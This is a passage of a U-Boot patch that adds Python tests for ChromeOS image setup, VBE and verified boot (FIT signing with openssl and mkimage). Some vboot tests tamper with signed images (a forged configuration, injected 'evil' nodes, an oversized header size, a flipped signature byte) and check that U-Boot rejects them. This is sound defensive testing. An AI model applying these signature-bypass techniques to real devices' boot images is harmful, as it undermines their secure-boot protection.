arch, kern, dummy): + """Pack a kernel containing some fake data + + Args: + cons (ConsoleBase): Console to use + arch (str): Architecture to use ('x86' or 'arm') + kern (str): Filename containing kernel + dummy (str): Dummy filename to use for config and bootloader + + Return: + bytes: Packed-kernel data + """ + kern_part = os.path.join(cons.config.result_dir, 'kern-part-{arch}.bin') + u_boot_utils.run_and_log( + cons, + f'futility vbutil_kernel --pack {kern_part} ' + '--keyblock doc/chromium/files/devkeys/kernel.keyblock ' + '--signprivate doc/chromium/files/devkeys/kernel_data_key.vbprivk ' + f'--version 1 --config {dummy} --bootloader {dummy} ' + f'--vmlinuz {kern}') + + with open(kern_part, 'rb') as inf: + kern_part_data = inf.read() + return kern_part_data + + def set_part_data(partnum, data): + """Set the contents of a disk partition + + This updates disk_data by putting data in the right place + + Args: + partnum (int): Partition number to set + data (bytes): Data for that partition + """ + nonlocal disk_data + + start = parts[partnum].start * sect_size + disk_data = disk_data[:start] + data + disk_data[start + len(data):] + + mmc_dev = 5 + fname = os.path.join(cons.config.source_dir, f'mmc{mmc_dev}.img') + u_boot_utils.run_and_log(cons, 'qemu-img create %s 20M' % fname) + #mnt = os.path.join(cons.config.persistent_data_dir, 'mnt') + #mkdir_cond(mnt) + u_boot_utils.run_and_log(cons, f'cgpt create {fname}') + + uuid_state = 'ebd0a0a2-b9e5-4433-87c0-68b6b72699c7' + uuid_kern = 'fe3a2a5d-4f32-41a7-b725-accc3285a309' + uuid_root = '3cb8e202-3b7e-47dd-8a3c-7ff2a13cfcec' + uuid_rwfw = 'cab6e88e-abf3-4102-a07a-d4bb9be3c1d3' + uuid_reserved = '2e0a753d-9e48-43b0-8337-b15192cb1b5e' + uuid_efi = 'c12a7328-f81f-11d2-ba4b-00a0c93ec93b' + + ptr = 40 + + # Number of sectors in 1MB + sect_size = 512 + sect_1mb = (1 << 20) // sect_size + + required_parts = [ + {'num': 0xb, 'label':'RWFW', 'type': uuid_rwfw, 'size': '1'}, + {'num': 6, 'label':'KERN_C', 'type': uuid_kern, 'size': '1'}, + {'num': 7, 'label':'ROOT_C', 'type': uuid_root, 'size': '1'}, + {'num': 9, 'label':'reserved', 'type': uuid_reserved, 'size': '1'}, + {'num': 0xa, 'label':'reserved', 'type': uuid_reserved, 'size': '1'}, + + {'num': 2, 'label':'KERN_A', 'type': uuid_kern, 'size': '1M'}, + {'num': 4, 'label':'KERN_B', 'type': uuid_kern, 'size': '1M'}, + + {'num': 8, 'label':'OEM', 'type': uuid_state, 'size': '1M'}, + {'num': 0xc, 'label':'EFI-SYSTEM', 'type': uuid_efi, 'size': '1M'}, + + {'num': 5, 'label':'ROOT_B', 'type': uuid_root, 'size': '1'}, + {'num': 3, 'label':'ROOT_A', 'type': uuid_root, 'size': '1'}, + {'num': 1, 'label':'STATE', 'type': uuid_state, 'size': '1M'}, + ] + + for part in required_parts: + size_str = part['size'] + if 'M' in size_str: + size = int(size_str[:-1]) * sect_1mb + else: + size = int(size_str) + u_boot_utils.run_and_log( + cons, + f"cgpt add -i {part['num']} -b {ptr} -s {size} -t {part['type']} {fname}") + ptr += size + + u_boot_utils.run_and_log(cons, f'cgpt boot -p {fname}') + out = u_boot_utils.run_and_log(cons, f'cgpt show -q {fname}') + '''We expect something like this: + 8239 2048 1 Basic data + 45 2048 2 ChromeOS kernel + 8238 1 3 ChromeOS rootfs + 2093 2048 4 ChromeOS kernel + 8237 1 5 ChromeOS rootfs + 41 1 6 ChromeOS kernel + 42 1 7 ChromeOS rootfs + 4141 2048 8 Basic data + 43 1 9 ChromeOS reserved + 44 1 10 ChromeOS reserved + 40 1 11 ChromeOS firmware + 6189 2048 12 EFI System Partition + ''' + + # Create a dict (indexed by partition number) containing the above info + for line in out.splitlines(): + start, size, num, name = line.split(maxsplit=3) + parts[int(num)] = Partition(int(start), int(size), name) + + dummy = os.path.join(cons.config.result_dir, 'dummy.txt') + with open(dummy, 'wb') as outf: + outf.write(b'dummy\n') + + # For now we just use dummy kernels. This limits testing to just detecting + # a signed kernel. We could add support for the x86 data structures so that + # testing could cover getting the cmdline, setup.bin and other pieces. + kern = os.path.join(cons.config.result_dir, 'kern.bin') + with open(kern, 'wb') as outf: + outf.write(b'kernel\n') + + with open(fname, 'rb') as inf: + disk_data = inf.read() + + # put x86 kernel in partition 2 and arm one in partition 4 + set_part_data(2, pack_kernel(cons, 'x86', kern, dummy)) + set_part_data(4, pack_kernel(cons, 'arm', kern, dummy)) + + with open(fname, 'wb') as outf: + outf.write(disk_data) + + return fname + + +def setup_cedit_file(cons): + infname = os.path.join(cons.config.source_dir, + 'test/boot/files/expo_layout.dts') + inhname = os.path.join(cons.config.source_dir, + 'test/boot/files/expo_ids.h') + expo_tool = os.path.join(cons.config.source_dir, 'tools/expo.py') + outfname = 'cedit.dtb' + u_boot_utils.run_and_log( + cons, f'{expo_tool} -e {inhname} -l {infname} -o {outfname}') + +@pytest.mark.buildconfigspec('ut_dm') +def test_ut_dm_init(u_boot_console): + """Initialize data for ut dm tests.""" + + fn = u_boot_console.config.source_dir + '/testflash.bin' + if not os.path.exists(fn): + data = b'this is a test' + data += b'\x00' * ((4 * 1024 * 1024) - len(data)) + with open(fn, 'wb') as fh: + fh.write(data) + + fn = u_boot_console.config.source_dir + '/spi.bin' + if not os.path.exists(fn): + data = b'\x00' * (2 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + + # Create a file with a single partition + fn = u_boot_console.config.source_dir + '/scsi.img' + if not os.path.exists(fn): + data = b'\x00' * (2 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + u_boot_utils.run_and_log( + u_boot_console, f'sfdisk {fn}', stdin=b'type=83') + + fs_helper.mk_fs(u_boot_console.config, 'ext2', 0x200000, '2MB') + fs_helper.mk_fs(u_boot_console.config, 'fat32', 0x100000, '1MB') + + mmc_dev = 6 + fn = os.path.join(u_boot_console.config.source_dir, f'mmc{mmc_dev}.img') + data = b'\x00' * (12 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + +@pytest.mark.buildconfigspec('cmd_bootflow') +def test_ut_dm_init_bootstd(u_boot_console): + """Initialise data for bootflow tests""" + + setup_bootflow_image(u_boot_console) + setup_bootmenu_image(u_boot_console) + setup_cedit_file(u_boot_console) + setup_cros_image(u_boot_console) + + # Restart so that the new mmc1.img is picked up + u_boot_console.restart_uboot() + + +def test_ut(u_boot_console, ut_subtest): + """Execute a "ut" subtest. + + The subtests are collected in function generate_ut_subtest() from linker + generated lists by applying a regular expression to the lines of file + u-boot.sym. The list entries are created using the C macro UNIT_TEST(). + + Strict naming conventions have to be followed to match the regular + expression. Use UNIT_TEST(foo_test_bar, _flags, foo_test) for a test bar in + test suite foo that can be executed via command 'ut foo bar' and is + implemented in C function foo_test_bar(). + + Args: + u_boot_console (ConsoleBase): U-Boot console + ut_subtest (str): test to be executed via command ut, e.g 'foo bar' to + execute command 'ut foo bar' + """ + + if ut_subtest == 'hush hush_test_simple_dollar': + # ut hush hush_test_simple_dollar prints "Unknown command" on purpose. + with u_boot_console.disable_check('unknown_command'): + output = u_boot_console.run_command('ut ' + ut_subtest) + assert('Unknown command \'quux\' - try \'help\'' in output) + else: + output = u_boot_console.run_command('ut ' + ut_subtest) + assert output.endswith('Failures: 0') diff --git a/test/py/tests/test_vbe.py b/test/py/tests/test_vbe.py new file mode 100644 index 00000000000..50b6c1cd911 --- /dev/null +++ b/test/py/tests/test_vbe.py @@ -0,0 +1,120 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2022 Google LLC +# +# Test addition of VBE + +import pytest + +import fit_util + +# Define a base ITS which we can adjust using % and a dictionary +base_its = ''' +/dts-v1/; + +/ { + description = "Example kernel"; + + images { + kernel-1 { + data = /incbin/("%(kernel)s"); + type = "kernel"; + arch = "sandbox"; + os = "linux"; + load = <0x40000>; + entry = <0x8>; + compression = "%(compression)s"; + + random { + compatible = "vbe,random-rand"; + vbe,size = <0x40>; + vbe,required; + }; + aslr1 { + compatible = "vbe,aslr-move"; + vbe,align = <0x100000>; + }; + aslr2 { + compatible = "vbe,aslr-rand"; + }; + efi-runtime { + compatible = "vbe,efi-runtime-rand"; + }; + wibble { + compatible = "vbe,wibble"; + }; + }; + + fdt-1 { + description = "snow"; + data = /incbin/("%(fdt)s"); + type = "flat_dt"; + arch = "sandbox"; + load = <%(fdt_addr)#x>; + compression = "%(compression)s"; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel-1"; + fdt = "fdt-1"; + }; + }; +}; +''' + +# Define a base FDT - currently we don't use anything in this +base_fdt = ''' +/dts-v1/; + +/ { + chosen { + }; +}; +''' + +# This is the U-Boot script that is run for each test. First load the FIT, +# then run the 'bootm' command, then run the unit test which checks that the +# working tree has the required things filled in according to the OS requests +# above (random, aslr2, etc.) +base_script = ''' +host load hostfs 0 %(fit_addr)x %(fit)s +fdt addr %(fit_addr)x +bootm start %(fit_addr)x +bootm loados +bootm prep +fdt addr +fdt print +ut bootstd -f vbe_test_fixup_norun +''' + +@pytest.mark.boardspec('sandbox_flattree') +@pytest.mark.requiredtool('dtc') +def test_vbe(u_boot_console): + cons = u_boot_console + kernel = fit_util.make_kernel(cons, 'vbe-kernel.bin', 'kernel') + fdt = fit_util.make_dtb(cons, base_fdt, 'vbe-fdt') + fdt_out = fit_util.make_fname(cons, 'fdt-out.dtb') + + params = { + 'fit_addr' : 0x1000, + + 'kernel' : kernel, + + 'fdt' : fdt, + 'fdt_out' : fdt_out, + 'fdt_addr' : 0x80000, + 'fdt_size' : 0x1000, + + 'compression' : 'none', + } + mkimage = cons.config.build_dir + '/tools/mkimage' + fit = fit_util.make_fit(cons, mkimage, base_its, params, 'test-vbe.fit', + base_fdt) + params['fit'] = fit + cmd = base_script % params + + with cons.log.section('Kernel load'): + output = cons.run_command_list(cmd.splitlines()) + + assert 'Failures: 0' in output[-1] diff --git a/test/py/tests/test_vbe_vpl.py b/test/py/tests/test_vbe_vpl.py new file mode 100644 index 00000000000..ed12d3a4618 --- /dev/null +++ b/test/py/tests/test_vbe_vpl.py @@ -0,0 +1,40 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2022 Google LLC +# +# Test addition of VBE + +import os + +import pytest +import u_boot_utils + +@pytest.mark.boardspec('sandbox_vpl') +@pytest.mark.requiredtool('dtc') +def test_vbe_vpl(u_boot_console): + cons = u_boot_console + #cmd = [cons.config.build_dir + fname, '-v'] + ram = os.path.join(cons.config.build_dir, 'ram.bin') + fdt = os.path.join(cons.config.build_dir, 'arch/sandbox/dts/test.dtb') + image_fname = os.path.join(cons.config.build_dir, 'image.bin') + + # Enable firmware1 and the mmc that it uses. These are needed for the full + # VBE flow. + u_boot_utils.run_and_log( + cons, f'fdtput -t s {fdt} /bootstd/firmware0 status disabled') + u_boot_utils.run_and_log( + cons, f'fdtput -t s {fdt} /bootstd/firmware1 status okay') + u_boot_utils.run_and_log( + cons, f'fdtput -t s {fdt} /mmc3 status okay') + u_boot_utils.run_and_log( + cons, f'fdtput -t s {fdt} /mmc3 filename {image_fname}') + + # Remove any existing RAM file, so we don't have old data present + if os.path.exists(ram): + os.remove(ram) + flags = ['-p', image_fname, '-w', '-s', 'state.dtb'] + cons.restart_uboot_with_flags(flags) + + # Make sure that VBE was used in both VPL (to load SPL) and SPL (to load + # U-Boot + output = cons.run_command('vbe state') + assert output == 'Phases: VPL SPL' diff --git a/test/py/tests/test_vboot.py b/test/py/tests/test_vboot.py new file mode 100644 index 00000000000..7e0e8e44750 --- /dev/null +++ b/test/py/tests/test_vboot.py @@ -0,0 +1,643 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016, Google Inc. +# +# U-Boot Verified Boot Test + +""" +This tests verified boot in the following ways: + +For image verification: +- Create FIT (unsigned) with mkimage +- Check that verification shows that no keys are verified +- Sign image +- Check that verification shows that a key is now verified + +For configuration verification: +- Corrupt signature and check for failure +- Create FIT (with unsigned configuration) with mkimage +- Check that image verification works +- Sign the FIT and mark the key as 'required' for verification +- Check that image verification works +- Corrupt the signature +- Check that image verification no-longer works + +For pre-load header verification: +- Create FIT image with a pre-load header +- Check that signature verification succeeds +- Corrupt the FIT image +- Check that signature verification fails +- Launch an FIT image without a pre-load header +- Check that image verification fails + +Tests run with both SHA1 and SHA256 hashing. + +This also tests fdt_add_pubkey utility in the simple way: +- Create DTB and FIT files +- Add keys with fdt_add_pubkey to DTB +- Sign FIT image +- Check with fit_check_sign that keys properly added to DTB file +""" + +import os +import shutil +import struct +import pytest +import u_boot_utils as util +import vboot_forge +import vboot_evil + +# Common helper functions +def dtc(dts, cons, dtc_args, datadir, tmpdir, dtb): + """Run the device tree compiler to compile a .dts file + + The output file will be the same as the input file but with a .dtb + extension. + + Args: + dts: Device tree file to compile. + cons: U-Boot console. + dtc_args: DTC arguments. + datadir: Path to data directory. + tmpdir: Path to temp directory. + dtb: Resulting DTB file. + """ + dtb = dts.replace('.dts', '.dtb') + util.run_and_log(cons, 'dtc %s %s%s -O dtb ' + '-o %s%s' % (dtc_args, datadir, dts, tmpdir, dtb)) + +def make_fit(its, cons, mkimage, dtc_args, datadir, fit): + """Make a new FIT from the .its source file. + + This runs 'mkimage -f' to create a new FIT. + + Args: + its: Filename containing .its source. + cons: U-Boot console. + mkimage: Path to mkimage utility. + dtc_args: DTC arguments. + datadir: Path to data directory. + fit: Resulting FIT file. + """ + util.run_and_log(cons, [mkimage, '-D', dtc_args, '-f', + '%s%s' % (datadir, its), fit]) + +# Only run the full suite on a few combinations, since it doesn't add any more +# test coverage. +TESTDATA_IN = [ + ['sha1-basic', 'sha1', '', None, False, True, False, False], + ['sha1-pad', 'sha1', '', '-E -p 0x10000', False, False, False, False], + ['sha1-pss', 'sha1', '-pss', None, False, False, False, False], + ['sha1-pss-pad', 'sha1', '-pss', '-E -p 0x10000', False, False, False, False], + ['sha256-basic', 'sha256', '', None, False, False, False, False], + ['sha256-pad', 'sha256', '', '-E -p 0x10000', False, False, False, False], + ['sha256-pss', 'sha256', '-pss', None, False, False, False, False], + ['sha256-pss-pad', 'sha256', '-pss', '-E -p 0x10000', False, False, False, False], + ['sha256-pss-required', 'sha256', '-pss', None, True, False, False, False], + ['sha256-pss-pad-required', 'sha256', '-pss', '-E -p 0x10000', True, True, False, False], + ['sha384-basic', 'sha384', '', None, False, False, False, False], + ['sha384-pad', 'sha384', '', '-E -p 0x10000', False, False, False, False], + ['algo-arg', 'algo-arg', '', '-o sha256,rsa2048', False, False, True, False], + ['sha256-global-sign', 'sha256', '', '', False, False, False, True], + ['sha256-global-sign-pss', 'sha256', '-pss', '', False, False, False, True], +] + +# Mark all but the first test as slow, so they are not run with '-k not slow' +TESTDATA = [TESTDATA_IN[0]] +TESTDATA += [pytest.param(*v, marks=pytest.mark.slow) for v in TESTDATA_IN[1:]] + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('fdtget') +@pytest.mark.requiredtool('fdtput') +@pytest.mark.requiredtool('openssl') +@pytest.mark.parametrize("name,sha_algo,padding,sign_options,required,full_test,algo_arg,global_sign", + TESTDATA) +def test_vboot(u_boot_console, name, sha_algo, padding, sign_options, required, + full_test, algo_arg, global_sign): + """Test verified boot signing with mkimage and verification with 'bootm'. + + This works using sandbox only as it needs to update the device tree used + by U-Boot to hold public keys from the signing process. + + The SHA1 and SHA256 tests are combined into a single test since the + key-generation process is quite slow and we want to avoid doing it twice. + """ + def dtc_options(dts, options): + """Run the device tree compiler to compile a .dts file + + The output file will be the same as the input file but with a .dtb + extension. + + Args: + dts: Device tree file to compile. + options: Options provided to the compiler. + """ + dtb = dts.replace('.dts', '.dtb') + util.run_and_log(cons, 'dtc %s %s%s -O dtb ' + '-o %s%s %s' % (dtc_args, datadir, dts, tmpdir, dtb, options)) + + def run_binman(dtb): + """Run binman to build an image + + Args: + dtb: Device tree file used as input file. + """ + pythonpath = os.environ.get('PYTHONPATH', '') + os.environ['PYTHONPATH'] = pythonpath + ':' + '%s/../scripts/dtc/pylibfdt' % tmpdir + util.run_and_log(cons, [binman, 'build', '-d', "%s/%s" % (tmpdir,dtb), + '-a', "pre-load-key-path=%s" % tmpdir, '-O', + tmpdir, '-I', tmpdir]) + os.environ['PYTHONPATH'] = pythonpath + + def run_bootm(sha_algo, test_type, expect_string, boots, fit=None): + """Run a 'bootm' command U-Boot. + + This always starts a fresh U-Boot instance since the device tree may + contain a new public key. + + Args: + test_type: A string identifying the test type. + expect_string: A string which is expected in the output. + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + boots: A boolean that is True if Linux should boot and False if + we are expected to not boot + fit: FIT filename to load and verify + """ + if not fit: + fit = '%stest.fit' % tmpdir + cons.restart_uboot() + with cons.log.section('Verified boot %s %s' % (sha_algo, test_type)): + output = cons.run_command_list( + ['host load hostfs - 100 %s' % fit, + 'fdt addr 100', + 'bootm 100']) + assert expect_string in ''.join(output) + if boots: + assert 'sandbox: continuing, as we cannot run' in ''.join(output) + else: + assert('sandbox: continuing, as we cannot run' + not in ''.join(output)) + + def sign_fit(sha_algo, options): + """Sign the FIT + + Signs the FIT and writes the signature into it. It also writes the + public key into the dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, '-K', dtb, '-r', fit] + if options: + args += options.split(' ') + cons.log.action('%s: Sign images' % sha_algo) + util.run_and_log(cons, args) + + def sign_fit_dtb(sha_algo, options, dtb): + """Sign the FIT + + Signs the FIT and writes the signature into it. It also writes the + public key into the dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, '-K', dtb, '-r', fit] + if options: + args += options.split(' ') + cons.log.action('%s: Sign images' % sha_algo) + util.run_and_log(cons, args) + + def sign_fit_norequire(sha_algo, options): + """Sign the FIT + + Signs the FIT and writes the signature into it. It also writes the + public key into the dtb. It does not mark key as 'required' in dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, '-K', dtb, fit] + if options: + args += options.split(' ') + cons.log.action('%s: Sign images' % sha_algo) + util.run_and_log(cons, args) + + def replace_fit_totalsize(size): + """Replace FIT header's totalsize with something greater. + + The totalsize must be less than or equal to FIT_SIGNATURE_MAX_SIZE. + If the size is greater, the signature verification should return false. + + Args: + size: The new totalsize of the header + + Returns: + prev_size: The previous totalsize read from the header + """ + total_size = 0 + with open(fit, 'r+b') as handle: + handle.seek(4) + total_size = handle.read(4) + handle.seek(4) + handle.write(struct.pack(">I", size)) + return struct.unpack(">I", total_size)[0] + + def corrupt_file(fit, offset, value): + """Corrupt a file + + To corrupt a file, a value is written at the specified offset + + Args: + fit: The file to corrupt + offset: Offset to write + value: Value written + """ + with open(fit, 'r+b') as handle: + handle.seek(offset) + handle.write(struct.pack(">I", value)) + + def create_rsa_pair(name): + """Generate a new RSA key paid and certificate + + Args: + name: Name of of the key (e.g. 'dev') + """ + public_exponent = 65537 + + if sha_algo == "sha384": + rsa_keygen_bits = 3072 + else: + rsa_keygen_bits = 2048 + + util.run_and_log(cons, 'openssl genpkey -algorithm RSA -out %s%s.key ' + '-pkeyopt rsa_keygen_bits:%d ' + '-pkeyopt rsa_keygen_pubexp:%d' % + (tmpdir, name, rsa_keygen_bits, public_exponent)) + + # Create a certificate containing the public key + util.run_and_log(cons, 'openssl req -batch -new -x509 -key %s%s.key ' + '-out %s%s.crt' % (tmpdir, name, tmpdir, name)) + + def test_with_algo(sha_algo, padding, sign_options): + """Test verified boot with the given hash algorithm. + + This is the main part of the test code. The same procedure is followed + for both hashing algorithms. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + sign_options: Options to mkimage when signing a fit image. + """ + # Compile our device tree files for kernel and U-Boot. These are + # regenerated here since mkimage will modify them (by adding a + # public key) below. + dtc('sandbox-kernel.dts', cons, dtc_args, datadir, tmpdir, dtb) + dtc('sandbox-u-boot.dts', cons, dtc_args, datadir, tmpdir, dtb) + + # Build the FIT, but don't sign anything yet + cons.log.action('%s: Test FIT with signed images' % sha_algo) + make_fit('sign-images-%s%s.its' % (sha_algo, padding), cons, mkimage, dtc_args, datadir, fit) + run_bootm(sha_algo, 'unsigned images', ' - OK' if algo_arg else 'dev-', True) + + # Sign images with our dev keys + sign_fit(sha_algo, sign_options) + run_bootm(sha_algo, 'signed images', 'dev+', True) + + # Create a fresh .dtb without the public keys + dtc('sandbox-u-boot.dts', cons, dtc_args, datadir, tmpdir, dtb) + + cons.log.action('%s: Test FIT with signed configuration' % sha_algo) + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), cons, mkimage, dtc_args, datadir, fit) + run_bootm(sha_algo, 'unsigned config', '%s+ OK' % ('sha256' if algo_arg else sha_algo), True) + + # Sign images with our dev keys + sign_fit(sha_algo, sign_options) + run_bootm(sha_algo, 'signed config', 'dev+', True) + + cons.log.action('%s: Check signed config on the host' % sha_algo) + + util.run_and_log(cons, [fit_check_sign, '-f', fit, '-k', dtb]) + + if full_test: + # Make sure that U-Boot checks that the config is in the list of + # hashed nodes. If it isn't, a security bypass is possible. + ffit = '%stest.forged.fit' % tmpdir + shutil.copyfile(fit, ffit) + with open(ffit, 'rb') as fd: + root, strblock = vboot_forge.read_fdt(fd) + root, strblock = vboot_forge.manipulate(root, strblock) + with open(ffit, 'w+b') as fd: + vboot_forge.write_fdt(root, strblock, fd) + util.run_and_log_expect_exception( + cons, [fit_check_sign, '-f', ffit, '-k', dtb], + 1, 'Failed to verify required signature') + + run_bootm(sha_algo, 'forged config', 'Bad Data Hash', False, ffit) + + # Try adding an evil root node. This should be detected. + efit = '%stest.evilf.fit' % tmpdir + shutil.copyfile(fit, efit) + vboot_evil.add_evil_node(fit, efit, evil_kernel, 'fakeroot') + + util.run_and_log_expect_exception( + cons, [fit_check_sign, '-f', efit, '-k', dtb], + 1, 'Failed to verify required signature') + run_bootm(sha_algo, 'evil fakeroot', 'Bad FIT kernel image format', + False, efit) + + # Try adding an @ to the kernel node name. This should be detected. + efit = '%stest.evilk.fit' % tmpdir + shutil.copyfile(fit, efit) + vboot_evil.add_evil_node(fit, efit, evil_kernel, 'kernel@') + + msg = 'Signature checking prevents use of unit addresses (@) in nodes' + util.run_and_log_expect_exception( + cons, [fit_check_sign, '-f', efit, '-k', dtb], + 1, msg) + run_bootm(sha_algo, 'evil kernel@', msg, False, efit) + + # Create a new properly signed fit and replace header bytes + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), cons, mkimage, dtc_args, datadir, fit) + sign_fit(sha_algo, sign_options) + bcfg = u_boot_console.config.buildconfig + max_size = int(bcfg.get('config_fit_signature_max_size', 0x10000000), 0) + existing_size = replace_fit_totalsize(max_size + 1) + run_bootm(sha_algo, 'Signed config with bad hash', 'Bad Data Hash', + False) + cons.log.action('%s: Check overflowed FIT header totalsize' % sha_algo) + + # Replace with existing header bytes + replace_fit_totalsize(existing_size) + run_bootm(sha_algo, 'signed config', 'dev+', True) + cons.log.action('%s: Check default FIT header totalsize' % sha_algo) + + # Increment the first byte of the signature, which should cause failure + sig = util.run_and_log(cons, 'fdtget -t bx %s %s value' % + (fit, sig_node)) + byte_list = sig.split() + byte = int(byte_list[0], 16) + byte_list[0] = '%x' % (byte + 1) + sig = ' '.join(byte_list) + util.run_and_log(cons, 'fdtput -t bx %s %s value %s' % + (fit, sig_node, sig)) + + run_bootm(sha_algo, 'Signed config with bad hash', 'Bad Data Hash', + False) + + cons.log.action('%s: Check bad config on the host' % sha_algo) + util.run_and_log_expect_exception( + cons, [fit_check_sign, '-f', fit, '-k', dtb], + 1, 'Failed to verify required signature') + + def test_required_key(sha_algo, padding, sign_options): + """Test verified boot with the given hash algorithm. + + This function tests if U-Boot rejects an image when a required key isn't + used to sign a FIT. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to use + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + sign_options: Options to mkimage when signing a fit image. + """ + # Compile our device tree files for kernel and U-Boot. These are + # regenerated here since mkimage will modify them (by adding a + # public key) below. + dtc('sandbox-kernel.dts', cons, dtc_args, datadir, tmpdir, dtb) + dtc('sandbox-u-boot.dts', cons, dtc_args, datadir, tmpdir, dtb) + + cons.log.action('%s: Test FIT with configs images' % sha_algo) + + # Build the FIT with prod key (keys required) and sign it. This puts the + # signature into sandbox-u-boot.dtb, marked 'required' + make_fit('sign-configs-%s%s-prod.its' % (sha_algo, padding), cons, mkimage, dtc_args, datadir, fit) + sign_fit(sha_algo, sign_options) + + # Build the FIT with dev key (keys NOT required). This adds the + # signature into sandbox-u-boot.dtb, NOT marked 'required'. + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), cons, mkimage, dtc_args, datadir, fit) + sign_fit_norequire(sha_algo, sign_options) + + # So now sandbox-u-boot.dtb two signatures, for the prod and dev keys. + # Only the prod key is set as 'required'. But FIT we just built has + # a dev signature only (sign_fit_norequire() overwrites the FIT). + # Try to boot the FIT with dev key. This FIT should not be accepted by + # U-Boot because the prod key is required. + run_bootm(sha_algo, 'required key', '', False) + + # Build the FIT with dev key (keys required) and sign it. This puts the + # signature into sandbox-u-boot.dtb, marked 'required'. + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), cons, mkimage, dtc_args, datadir, fit) + sign_fit(sha_algo, sign_options) + + # Set the required-mode policy to "any". + # So now sandbox-u-boot.dtb two signatures, for the prod and dev keys. + # Both the dev and prod key are set as 'required'. But FIT we just built has + # a dev signature only (sign_fit() overwrites the FIT). + # Try to boot the FIT with dev key. This FIT should be accepted by + # U-Boot because the dev key is required and policy is "any" required key. + util.run_and_log(cons, 'fdtput -t s %s /signature required-mode any' % + (dtb)) + run_bootm(sha_algo, 'multi required key', 'dev+', True) + + # Set the required-mode policy to "all". + # So now sandbox-u-boot.dtb two signatures, for the prod and dev keys. + # Both the dev and prod key are set as 'required'. But FIT we just built has + # a dev signature only (sign_fit() overwrites the FIT). + # Try to boot the FIT with dev key. This FIT should not be accepted by + # U-Boot because the prod key is required and policy is "all" required key + util.run_and_log(cons, 'fdtput -t s %s /signature required-mode all' % + (dtb)) + run_bootm(sha_algo, 'multi required key', '', False) + + def test_global_sign(sha_algo, padding, sign_options): + """Test global image signature with the given hash algorithm and padding. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to use + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + """ + + dtb = '%ssandbox-u-boot-global%s.dtb' % (tmpdir, padding) + cons.config.dtb = dtb + + # Compile our device tree files for kernel and U-Boot. These are + # regenerated here since mkimage will modify them (by adding a + # public key) below. + dtc('sandbox-kernel.dts', cons, dtc_args, datadir, tmpdir, dtb) + dtc_options('sandbox-u-boot-global%s.dts' % padding, '-p 1024') + + # Build the FIT with dev key (keys NOT required). This adds the + # signature into sandbox-u-boot.dtb, NOT marked 'required'. + make_fit('simple-images.its', cons, mkimage, dtc_args, datadir, fit) + sign_fit_dtb(sha_algo, '', dtb) + + # Build the dtb for binman that define the pre-load header + # with the global sigature. + dtc('sandbox-binman%s.dts' % padding, cons, dtc_args, datadir, tmpdir, dtb) + + # Run binman to create the final image with the not signed fit + # and the pre-load header that contains the global signature. + run_binman('sandbox-binman%s.dtb' % padding) + + # Check that the signature is correctly verified by u-boot + run_bootm(sha_algo, 'global image signature', + 'signature check has succeed', True, "%ssandbox.img" % tmpdir) + + # Corrupt the image (just one byte after the pre-load header) + corrupt_file("%ssandbox.img" % tmpdir, 4096, 255); + + # Check that the signature verification fails + run_bootm(sha_algo, 'global image signature', + 'signature check has failed', False, "%ssandbox.img" % tmpdir) + + # Check that the boot fails if the global signature is not provided + run_bootm(sha_algo, 'global image signature', 'signature is mandatory', False) + + cons = u_boot_console + tmpdir = os.path.join(cons.config.result_dir, name) + '/' + if not os.path.exists(tmpdir): + os.mkdir(tmpdir) + datadir = cons.config.source_dir + '/test/py/tests/vboot/' + fit = '%stest.fit' % tmpdir + mkimage = cons.config.build_dir + '/tools/mkimage' + binman = cons.config.source_dir + '/tools/binman/binman' + fit_check_sign = cons.config.build_dir + '/tools/fit_check_sign' + dtc_args = '-I dts -O dtb -i %s' % tmpdir + dtb = '%ssandbox-u-boot.dtb' % tmpdir + sig_node = '/configurations/conf-1/signature' + + create_rsa_pair('dev') + create_rsa_pair('prod') + + # Create a number kernel image with zeroes + with open('%stest-kernel.bin' % tmpdir, 'wb') as fd: + fd.write(500 * b'\0') + + # Create a second kernel image with ones + evil_kernel = '%stest-kernel1.bin' % tmpdir + with open(evil_kernel, 'wb') as fd: + fd.write(500 * b'\x01') + + # We need to use our own device tree file. Remember to restore it + # afterwards. + old_dtb = cons.config.dtb + try: + cons.config.dtb = dtb + if global_sign: + test_global_sign(sha_algo, padding, sign_options) + elif required: + test_required_key(sha_algo, padding, sign_options) + else: + test_with_algo(sha_algo, padding, sign_options) + finally: + # Go back to the original U-Boot with the correct dtb. + cons.config.dtb = old_dtb + cons.restart_uboot() + + +TESTDATA_IN = [ + ['sha1-basic', 'sha1', '', None, False], + ['sha1-pad', 'sha1', '', '-E -p 0x10000', False], + ['sha1-pss', 'sha1', '-pss', None, False], + ['sha1-pss-pad', 'sha1', '-pss', '-E -p 0x10000', False], + ['sha256-basic', 'sha256', '', None, False], + ['sha256-pad', 'sha256', '', '-E -p 0x10000', False], + ['sha256-pss', 'sha256', '-pss', None, False], + ['sha256-pss-pad', 'sha256', 